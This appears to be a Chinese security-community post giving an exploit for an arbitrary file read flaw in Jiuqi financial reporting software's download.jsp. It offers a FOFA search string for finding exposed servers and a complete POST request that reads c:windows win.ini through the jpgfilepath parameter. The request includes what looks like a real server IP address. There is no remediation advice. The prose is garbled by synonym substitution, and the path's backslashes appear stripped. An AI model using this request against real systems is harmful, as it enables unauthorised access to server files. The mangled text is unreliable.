久其财务报表 download.jsp 任意文件读取漏洞

破绽描绘

久其财务报表 download.jsp 存在恣意文件读取破绽,攻击者经过破绽能够获取效劳器上的信息
 


 

破绽影响

久其财务报表
 


 

破绽复现

FOFA

body="/netrep/"

登录途径如下
图片[1]-久其财务报表 download.jsp 任意文件读取漏洞-孤勇者社区

发送恳求包

POST /netrep/ebook/browse/download.jsp HTTP/1.1
Host:
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.251.113.53:7002
Content-Type: application/x-www-form-urlencoded

jpgfilepath=c:windowswin.ini

图片[2]-久其财务报表 download.jsp 任意文件读取漏洞-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞11赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片